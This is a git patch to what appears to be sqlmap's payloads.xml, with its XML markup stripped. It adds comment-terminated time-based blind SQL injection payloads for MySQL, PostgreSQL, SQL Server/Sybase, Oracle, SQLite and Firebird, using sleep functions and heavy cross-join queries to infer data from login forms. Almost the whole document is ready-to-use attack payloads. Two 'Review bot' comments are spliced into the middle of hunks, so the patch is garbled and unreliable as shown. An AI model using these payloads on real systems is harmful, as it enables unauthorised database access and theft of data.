From 1b3717c79cf7c1a8d5b8fc69062b25d948cda222 Mon Sep 17 00:00:00 2001
From: Bernardo Damele
Date: Wed, 12 Jan 2011 16:20:29 +0000
Subject: [PATCH] Improvement to make time-based blind to work also against login forms
---
xml/payloads.xml | 184 +++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 184 insertions(+)
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 204f4a4e5..aa0c50b49 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1520,6 +1520,27 @@ Formats: + + MySQL > 5.0.11 AND time-based blind (comment) + 5 + 4 + 1 + 1,2,3 + 1 + AND [RANDNUM]=IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM]) + + AND SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + > 5.0.11 +
+
+ MySQL < 5.0.12 AND time-based blind (heavy query) 5
@@ -1539,6 +1560,26 @@ Formats: + + MySQL < 5.0.12 AND time-based blind (heavy query - comment) + 5 + 5 + 1 + 1,2,3 + 1 + AND [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM]) + + AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')) + # + + + + +
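Review bot: The second numeric field of the new MySQL "(comment)" entry is `4` (`+ 5 + 4 + 1`), while every other entry this commit adds carries `5` in that position (`+ 5 + 5 + 1`); with the XML tags stripped in this rendering it appears to be the test level, so this entry would presumably be scheduled differently from its siblings. If that is intentional, a short `<!-- -->` note next to the value stating why the level differs would keep the new set of comment-terminated tests self-explanatory; otherwise change it to `5` for consistency. The hunk's closing lines end at the start of the next physical line, just before the following `@@` header.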
+ MySQL +
+
+ PostgreSQL > 8.1 AND time-based blind 5
@@ -1559,6 +1600,27 @@ Formats: + + PostgreSQL > 8.1 AND time-based blind (comment) + 5 + 5 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + -- + + + + +
+ PostgreSQL + > 8.1 +
+
+ PostgreSQL AND time-based blind (heavy query) 5
@@ -1578,6 +1640,26 @@ Formats: + + PostgreSQL AND time-based blind (heavy query - comment) + 5 + 5 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) + -- + + + + +
+ PostgreSQL +
+
+ Microsoft SQL Server/Sybase AND time-based blind (heavy query) 5
@@ -1597,6 +1679,26 @@ Formats: + + Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment) + 5 + 5 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) + -- + + + + +
+ Microsoft SQL Server +
+
+ Oracle AND time-based blind 5
@@ -1616,6 +1718,26 @@ Formats: + + Oracle AND time-based blind (comment) + 5 + 5 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) + + AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]', [SLEEPTIME]) + -- + + + + +
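Review bot: Alias keywords are written inconsistently inside the Microsoft SQL Server/Sybase "(heavy query - comment)" vector and payload: `sysusers as sys2, sysusers as sys3` is lowercase next to `sysusers AS sys1` and `AS sys4` through `AS sys7` in the same expression, whereas the Firebird entry added by this commit spells `AS` in uppercase throughout; write `AS` for sys2 and sys3 as well, in both the vector and the payload. The Oracle "(comment)" entry in the following hunk has a similar mismatch between its two copies of the same call: the vector reads `'[RANDSTR]',[SLEEPTIME]` while the payload reads `'[RANDSTR]', [SLEEPTIME]`; pick one spacing for both so the pair stays greppable as one expression.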
+ Oracle +
+
+ Oracle AND time-based blind (heavy query) 5
@@ -1635,6 +1757,26 @@ Formats: + + Oracle AND time-based blind (heavy query - comment) + 5 + 5 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5) + -- + + + + +
+ Oracle +
+
+ SQLite > 2.0 AND time-based blind (heavy query) 5
@@ -1655,6 +1797,27 @@ Formats: + + SQLite > 2.0 AND time-based blind (heavy query - comment) + 5 + 5 + 1 + 1 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END) + + AND [RANDNUM]=LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000)))) + -- + + + + +
+ SQLite + > 2.0 +
+
+ Firebird AND time-based blind (heavy query) 5
@@ -1674,6 +1837,27 @@ Formats: >= 2.0 + + + Firebird AND time-based blind (heavy query - comment) + 5 + 5 + 1 + 1 + 1 + AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3) + -- + + + + +
+ Firebird + >= 2.0 +
+